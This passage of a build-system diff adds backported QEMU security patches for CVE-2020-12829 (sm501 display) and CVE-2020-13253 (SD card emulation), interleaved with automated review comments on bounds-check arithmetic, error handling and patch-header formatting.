+Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#3
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index f42d05e1e4..97660090bb 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+- int rtl = s->twoD_control & 0x8000000;
++ int rtl = s->twoD_control & BIT(27);
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
+ }
+ }
+
+- if ((s->twoD_source_base & 0x08000000) ||
+- (s->twoD_destination_base & 0x08000000)) {
++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
new file mode 100644
index 0000000000..485af05e1e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
+From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Make variables local to the block they are used in to make it clearer
+which operation they are needed for.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 97660090bb..5ed57703d8 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+
+ static void sm501_2d_operation(SM501State *s)
+ {
+- /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & BIT(27);
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
+- uint32_t color = s->twoD_foreground;
+ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ int dst_y = s->twoD_destination & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-
+- /* get frame buffer info */
+- uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+@@ -758,6 +749,13 @@ static void sm501_2d_operation(SM501State *s)
+
+ switch (cmd) {
+ case 0x00: /* copy area */
++ {
++ int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ int src_y = s->twoD_source & 0xFFFF;
++ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++ uint8_t *src = s->local_mem + src_base;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+ for (y = 0; y < height; y++) { \
+@@ -793,8 +791,11 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ case 0x01: /* fill rectangle */
++ {
++ uint32_t color = s->twoD_foreground;
++
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+ for (y = 0; y < height; y++) { \
+@@ -819,7 +820,7 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+ }
+ break;
+-
++ }
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+ cmd);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
new file mode 100644
index 0000000000..ab09e8b039
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_5.patch
@@ -0,0 +1,266 @@
+From b15a22bbcbe6a78dc3d88fe3134985e4cdd87de4 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 5/5] sm501: Replace hand written implementation with pixman
+ where possible
+
+Besides being faster this should also prevent malicious guests to
+abuse 2D engine to overwrite data or cause a crash.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: 58666389b6cae256e4e972a32c05cf8aa51bffc0.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 207 ++++++++++++++++++++++++++-------------------
+ 1 file changed, 119 insertions(+), 88 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 5ed57703d8..8bf4d111f4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -706,13 +706,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+ int rop = s->twoD_control & 0xFF;
+- int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+- int dst_y = s->twoD_destination & 0xFFFF;
+- int width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int height = s->twoD_dimension & 0xFFFF;
++ unsigned int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++ unsigned int dst_y = s->twoD_destination & 0xFFFF;
++ unsigned int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ unsigned int height = s->twoD_dimension & 0xFFFF;
+ uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+- uint8_t *dst = s->local_mem + dst_base;
+- int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
++ unsigned int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+@@ -721,104 +720,136 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- if (rop_mode == 0) {
+- if (rop != 0xcc) {
+- /* Anything other than plain copies are not supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop3 mode with rop %x is not "
+- "supported.\n", rop);
+- }
+- } else {
+- if (rop2_source_is_pattern && rop != 0x5) {
+- /* For pattern source, we support only inverse dest */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop2 source being the pattern and "
+- "rop %x is not supported.\n", rop);
+- } else {
+- if (rop != 0x5 && rop != 0xc) {
+- /* Anything other than plain copies or inverse dest is not
+- * supported */
+- qemu_log_mask(LOG_UNIMP, "sm501: rop mode %x is not "
+- "supported.\n", rop);
+- }
+- }
+- }
+-
+ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+
++ if (!dst_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero dest pitch.\n");
++ return;
++ }
++
++ if (!width || !height) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero size 2D op.\n");
++ return;
++ }
++
++ if (rtl) {
++ dst_x -= width - 1;
++ dst_y -= height - 1;
++ }
++
++ if (dst_base >= get_local_mem_size(s) || dst_base +
++ (dst_x + width + (dst_y + height) * (dst_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: 2D op dest is outside vram.\n");
++ return;
++ }
++
+ switch (cmd) {
+- case 0x00: /* copy area */
++ case 0: /* BitBlt */
+ {
+- int src_x = (s->twoD_source >> 16) & 0x01FFF;
+- int src_y = s->twoD_source & 0xFFFF;
++ unsigned int src_x = (s->twoD_source >> 16) & 0x01FFF;
++ unsigned int src_y = s->twoD_source & 0xFFFF;
+ uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
+- uint8_t *src = s->local_mem + src_base;
+- int src_pitch = s->twoD_pitch & 0x1FFF;
+-
+-#define COPY_AREA(_bpp, _pixel_type, rtl) { \
+- int y, x, index_d, index_s; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- _pixel_type val; \
+- \
+- if (rtl) { \
+- index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+- } else { \
+- index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- } \
+- if (rop_mode == 1 && rop == 5) { \
+- /* Invert dest */ \
+- val = ~*(_pixel_type *)&dst[index_d]; \
+- } else { \
+- val = *(_pixel_type *)&src[index_s]; \
+- } \
+- *(_pixel_type *)&dst[index_d] = val; \
+- } \
+- } \
+- }
+- switch (format) {
+- case 0:
+- COPY_AREA(1, uint8_t, rtl);
+- break;
+- case 1:
+- COPY_AREA(2, uint16_t, rtl);
+- break;
+- case 2:
+- COPY_AREA(4, uint32_t, rtl);
+- break;
++ unsigned int src_pitch = s->twoD_pitch & 0x1FFF;
++
++ if (!src_pitch) {
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: Zero src pitch.\n");
++ return;
++ }
++
++ if (rtl) {
++ src_x -= width - 1;
++ src_y -= height - 1;
++ }
++
++ if (src_base >= get_local_mem_size(s) || src_base +
++ (src_x + width + (src_y + height) * (src_pitch + width)) *
++ (1 << format) >= get_local_mem_size(s)) {
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "sm501: 2D op src is outside vram.\n");
++ return;
++ }
++
++ if ((rop_mode && rop == 0x5) || (!rop_mode && rop == 0x55)) {
++ /* Invert dest, is there a way to do this with pixman? */
++ unsigned int x, y, i;
++ uint8_t *d = s->local_mem + dst_base;
++
++ for (y = 0; y < height; y++) {
++ i = (dst_x + (dst_y + y) * dst_pitch) * (1 << format);
++ for (x = 0; x < width; x++, i += (1 << format)) {
++ switch (format) {
++ case 0:
++ d[i] = ~d[i];
++ break;
++ case 1:
++ *(uint16_t *)&d[i] = ~*(uint16_t *)&d[i];
++ break;
++ case 2:
++ *(uint32_t *)&d[i] = ~*(uint32_t *)&d[i];
++ break;
++ }
++ }
++ }
++ } else {
++ /* Do copy src for unimplemented ops, better than unpainted area */
++ if ((rop_mode && (rop != 0xc || rop2_source_is_pattern)) ||
++ (!rop_mode && rop != 0xcc)) {
++ qemu_log_mask(LOG_UNIMP,
++ "sm501: rop%d op %x%s not implemented\n",
++ (rop_mode ? 2 : 3), rop,
++ (rop2_source_is_pattern ?
++ " with pattern source" : ""));
++ }
++ /* Check for overlaps, this could be made more exact */
++ uint32_t sb, se, db, de;
++ sb = src_base + src_x + src_y * (width + src_pitch);
++ se = sb + width + height * (width + src_pitch);
++ db = dst_base + dst_x + dst_y * (width + dst_pitch);
++ de = db + width + height * (width + dst_pitch);
++ if (rtl && ((db >= sb && db <= se) || (de >= sb && de <= se))) {
++ /* regions may overlap: copy via temporary */
++ int llb = width * (1 << format);
++ int tmp_stride = DIV_ROUND_UP(llb, sizeof(uint32_t));
++ uint32_t *tmp = g_malloc(tmp_stride * sizeof(uint32_t) *
++ height);
++ pixman_blt((uint32_t *)&s->local_mem[src_base], tmp,
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ tmp_stride, 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, 0, 0, width, height);
++ pixman_blt(tmp, (uint32_t *)&s->local_mem[dst_base],
++ tmp_stride,
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ 0, 0, dst_x, dst_y, width, height);
++ g_free(tmp);
++ } else {
++ pixman_blt((uint32_t *)&s->local_mem[src_base],
++ (uint32_t *)&s->local_mem[dst_base],
++ src_pitch * (1 << format) / sizeof(uint32_t),
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), 8 * (1 << format),
++ src_x, src_y, dst_x, dst_y, width, height);
++ }
+ }
+ break;
+ }
+- case 0x01: /* fill rectangle */
++ case 1: /* Rectangle Fill */
+ {
+ uint32_t color = s->twoD_foreground;
+
+-#define FILL_RECT(_bpp, _pixel_type) { \
+- int y, x; \
+- for (y = 0; y < height; y++) { \
+- for (x = 0; x < width; x++) { \
+- int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+- *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+- } \
+- } \
+- }
+-
+- switch (format) {
+- case 0:
+- FILL_RECT(1, uint8_t);
+- break;
+- case 1:
+- color = cpu_to_le16(color);
+- FILL_RECT(2, uint16_t);
+- break;
+- case 2:
++ if (format == 2) {
+ color = cpu_to_le32(color);
+- FILL_RECT(4, uint32_t);
+- break;
++ } else if (format == 1) {
++ color = cpu_to_le16(color);
+ }
++
++ pixman_fill((uint32_t *)&s->local_mem[dst_base],
++ dst_pitch * (1 << format) / sizeof(uint32_t),
++ 8 * (1 << format), dst_x, dst_y, width, height, color);
+ break;
+ }
+ default:
+--
+2.25.1
+
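Review bot: The new dest and src bounds checks in sm501_2d_operation are evaluated in 32-bit unsigned arithmetic, so `(dst_x + width + (dst_y + height) * (dst_pitch + width)) * (1 << format)` can wrap for the largest values the register masks allow (13-bit x/width/pitch, 16-bit y/height) and then compare as a small offset. Doing the sum in 64 bits avoids that, e.g. `uint64_t end = dst_base + ((uint64_t)dst_x + width + ((uint64_t)dst_y + height) * (dst_pitch + width)) * (1 << format);` followed by `if (end >= get_local_mem_size(s))`, with the same change for the src check. Separately, `format` is masked with 0x3 earlier in the function, so the value 3 would reach `pixman_blt`/`pixman_fill` as a 64 bpp request, and their return values are ignored; rejecting format 3 up front with a LOG_GUEST_ERROR message would make that case explicit. The function body starts and ends outside the hunk.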
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
new file mode 100644
index 0000000000..7f8383987c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_1.patch
@@ -0,0 +1,50 @@
+From 6dd3a164f5b31c703c7d8372841ad3bd6a57de6d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 5 Jun 2018 22:28:51 -0300
+Subject: [PATCH 1/1] hw/sd/sdcard: Simplify realize() a bit
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+We don't need to check if sd->blk is set twice.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-18-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 1cc16bf..edd60a0 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -2105,12 +2105,12 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ return;
+ }
+
+- if (sd->blk && blk_is_read_only(sd->blk)) {
+- error_setg(errp, "Cannot use read-only drive as SD card");
+- return;
+- }
+-
+ if (sd->blk) {
++ if (blk_is_read_only(sd->blk)) {
++ error_setg(errp, "Cannot use read-only drive as SD card");
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+1.8.3.1
+
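Review bot: The provenance trailer in this patch header is spelled `Upstram-Status: Backport:` with the URL on the following line, so tooling that looks for the `Upstream-Status` tag will presumably not recognise it. The usual form is a single line, `Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=6dd3a164f5b31c703c7d8372841ad3bd6a57de6d]`. The same misspelling appears in CVE-2020-13253_2.patch through CVE-2020-13253_5.patch. This patch only regroups the read-only check in sd_realize and does not change behaviour, so its `CVE: CVE-2020-13253` line would be clearer with a dependency marker, as the CVE-2020-12829 series does with `dep#N`.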
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
new file mode 100644
index 0000000000..53145d059f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_2.patch
@@ -0,0 +1,112 @@
+From a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 7 Jul 2020 13:02:34 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not allow invalid SD card sizes
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+QEMU allows to create SD card with unrealistic sizes. This could
+work, but some guests (at least Linux) consider sizes that are not
+a power of 2 as a firmware bug and fix the card size to the next
+power of 2.
+
+While the possibility to use small SD card images has been seen as
+a feature, it became a bug with CVE-2020-13253, where the guest is
+able to do OOB read/write accesses past the image size end.
+
+In a pair of commits we will fix CVE-2020-13253 as:
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ WP_VIOLATION errors are not modified: the error bit is set, we
+ stay in receive-data state, wait for a stop command. All further
+ data transfer is ignored. See the check on sd->card_status at the
+ beginning of sd_read_data() and sd_write_data().
+
+While this is the correct behavior, in case QEMU create smaller SD
+cards, guests still try to access past the image size end, and QEMU
+considers this is an invalid address, thus "all further data transfer
+is ignored". This is wrong and make the guest looping until
+eventually timeouts.
+
+Fix by not allowing invalid SD card sizes (suggesting the expected
+size as a hint):
+
+ $ qemu-system-arm -M orangepi-pc -drive file=rootfs.ext2,if=sd,format=raw
+ qemu-system-arm: Invalid SD card size: 60 MiB
+ SD card size has to be a power of 2, e.g. 64 MiB.
+ You can resize disk images with 'qemu-img resize <imagefile> <new-size>'
+ (note that this will lose data if you make the image smaller than it currently is).
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Message-Id: <20200713183209.26308-8-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=a9bcedd15a5834ca9ae6c3a97933e85ac7edbd36
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 25 +++++++++++++++++++++++++
+ 1 file changed, 25 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index edd60a09c0..76d68359a4 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -32,6 +32,7 @@
+
+ #include "qemu/osdep.h"
+ #include "qemu/units.h"
++#include "qemu/cutils.h"
+ #include "hw/irq.h"
+ #include "hw/registerfields.h"
+ #include "sysemu/block-backend.h"
+@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ }
+
+ if (sd->blk) {
++ int64_t blk_size;
++
+ if (blk_is_read_only(sd->blk)) {
+ error_setg(errp, "Cannot use read-only drive as SD card");
+ return;
+ }
+
++ blk_size = blk_getlength(sd->blk);
++ if (blk_size > 0 && !is_power_of_2(blk_size)) {
++ int64_t blk_size_aligned = pow2ceil(blk_size);
++ char *blk_size_str;
++
++ blk_size_str = size_to_str(blk_size);
++ error_setg(errp, "Invalid SD card size: %s", blk_size_str);
++ g_free(blk_size_str);
++
++ blk_size_str = size_to_str(blk_size_aligned);
++ error_append_hint(errp,
++ "SD card size has to be a power of 2, e.g. %s.\n"
++ "You can resize disk images with"
++ " 'qemu-img resize <imagefile> <new-size>'\n"
++ "(note that this will lose data if you make the"
++ " image smaller than it currently is).\n",
++ blk_size_str);
++ g_free(blk_size_str);
++
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+2.32.0
+
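Review bot: In the added size check in sd_realize, the condition `blk_size > 0 && !is_power_of_2(blk_size)` skips validation when `blk_getlength()` returns a negative value (an error), so realization continues to `blk_set_perm()` with a length that was never read. Handling that case explicitly before the power-of-2 test keeps such a backend from being accepted: `if (blk_size < 0) { error_setg_errno(errp, -blk_size, "Cannot get SD card size"); return; }`. What the rest of sd_realize does with the size is outside the hunk, so the impact should be confirmed there.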
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
+From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Mon, 13 Jul 2020 09:27:35 +0200
+Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+To make the next commit easier to review, clean this code first.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+--- a/hw/sd/sd.c (revision b0ca999a43a22b38158a222233d3f5881648bb4f)
++++ b/hw/sd/sd.c (date 1647514442924)
+@@ -1154,8 +1154,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1170,8 +1171,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1216,12 +1218,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
+@@ -1240,12 +1245,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
+From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Thu, 4 Jun 2020 19:22:29 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
+ invalid
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Only move the state machine to ReceivingData if there is no
+pending error. This avoids later OOB access while processing
+commands queued.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.3 Data Read
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ 4.3.4 Data Write
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+WP_VIOLATION errors are not modified: the error bit is set, we
+stay in receive-data state, wait for a stop command. All further
+data transfer is ignored. See the check on sd->card_status at the
+beginning of sd_read_data() and sd_write_data().
+
+Fixes: CVE-2020-13253
+
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
+ 1 file changed, 24 insertions(+), 14 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index f4f76f8fd2..fad9cf1ee7 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 17: /* CMD17: READ_SINGLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
